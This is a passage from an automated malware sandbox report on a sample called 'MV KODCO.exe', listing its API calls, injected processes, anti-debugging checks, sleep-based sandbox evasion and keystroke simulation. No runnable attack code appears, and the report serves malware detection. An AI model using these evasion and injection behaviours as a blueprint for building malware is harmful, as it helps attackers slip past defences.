                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005FEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_005FEB42
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0060123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0060123A
                Source: C:\Users\user\Desktop\MV KODCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\MV KODCO.exeAPI/Special instruction interceptor: Address: 1074914
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
                Source: C:\Windows\SysWOW64\ktmutil.exeWindow / User API: threadDelayed 484Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeWindow / User API: threadDelayed 9490Jump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-93500
                Source: C:\Users\user\Desktop\MV KODCO.exeAPI coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 7912Thread sleep count: 484 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 7912Thread sleep time: -968000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 7912Thread sleep count: 9490 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 7912Thread sleep time: -18980000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe TID: 7920Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00626CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00626CA9
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_006260DD
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_006263F9
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0062EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0062EB60
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0062F56F FindFirstFileW,FindClose,0_2_0062F56F
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0062F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0062F5FA
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00631B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00631B2F
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00631C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00631C8A
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00631F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00631F94
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005FDDC0
                Source: ktmutil.exe, 00000007.00000002.2932130624.0000000003223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
                Source: cMOROZNpvCGcdz.exe, 00000008.00000002.2932984126.0000000000E9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                Source: firefox.exe, 00000009.00000002.2271229886.000001F4A3C2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\MV KODCO.exeAPI call chain: ExitProcess graph end nodegraph_0-92861
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00437A83 LdrLoadDll,1_2_00437A83
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00636AAF BlockInput,0_2_00636AAF
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_005E3D19
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00613920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00613920
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005FE01E LoadLibraryA,GetProcAddress,0_2_005FE01E
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_01073580 mov eax, dword ptr fs:[00000030h]0_2_01073580
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_01074B80 mov eax, dword ptr fs:[00000030h]0_2_01074B80
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_01074BE0 mov eax, dword ptr fs:[00000030h]0_2_01074BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov ecx, dword ptr fs:[00000030h]1_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300634F mov eax, dword ptr fs:[00000030h]1_2_0300634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]1_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2826B mov eax, dword ptr fs:[00000030h]1_2_02F2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A250 mov eax, dword ptr fs:[00000030h]1_2_02F2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36259 mov eax, dword ptr fs:[00000030h]1_2_02F36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]1_2_02FEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]1_2_02FEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov eax, dword ptr fs:[00000030h]1_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov ecx, dword ptr fs:[00000030h]1_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2823B mov eax, dword ptr fs:[00000030h]1_2_02F2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F663FF mov eax, dword ptr fs:[00000030h]1_2_02F663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]1_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC3CD mov eax, dword ptr fs:[00000030h]1_2_02FEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB63C0 mov eax, dword ptr fs:[00000030h]1_2_02FB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300625D mov eax, dword ptr fs:[00000030h]1_2_0300625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD437C mov eax, dword ptr fs:[00000030h]1_2_02FD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov ecx, dword ptr fs:[00000030h]1_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA352 mov eax, dword ptr fs:[00000030h]1_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8350 mov ecx, dword ptr fs:[00000030h]1_2_02FD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030062D6 mov eax, dword ptr fs:[00000030h]1_2_030062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C310 mov ecx, dword ptr fs:[00000030h]1_2_02F2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50310 mov ecx, dword ptr fs:[00000030h]1_2_02F50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]1_2_02F2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F720F0 mov ecx, dword ptr fs:[00000030h]1_2_02F720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_02F2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F380E9 mov eax, dword ptr fs:[00000030h]1_2_02F380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB60E0 mov eax, dword ptr fs:[00000030h]1_2_02FB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB20DE mov eax, dword ptr fs:[00000030h]1_2_02FB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov eax, dword ptr fs:[00000030h]1_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]1_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F280A0 mov eax, dword ptr fs:[00000030h]1_2_02F280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC80A8 mov eax, dword ptr fs:[00000030h]1_2_02FC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004164 mov eax, dword ptr fs:[00000030h]1_2_03004164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004164 mov eax, dword ptr fs:[00000030h]1_2_03004164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3208A mov eax, dword ptr fs:[00000030h]1_2_02F3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C073 mov eax, dword ptr fs:[00000030h]1_2_02F5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32050 mov eax, dword ptr fs:[00000030h]1_2_02F32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6050 mov eax, dword ptr fs:[00000030h]1_2_02FB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6030 mov eax, dword ptr fs:[00000030h]1_2_02FC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A020 mov eax, dword ptr fs:[00000030h]1_2_02F2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C020 mov eax, dword ptr fs:[00000030h]1_2_02F2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030061E5 mov eax, dword ptr fs:[00000030h]1_2_030061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4000 mov ecx, dword ptr fs:[00000030h]1_2_02FB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
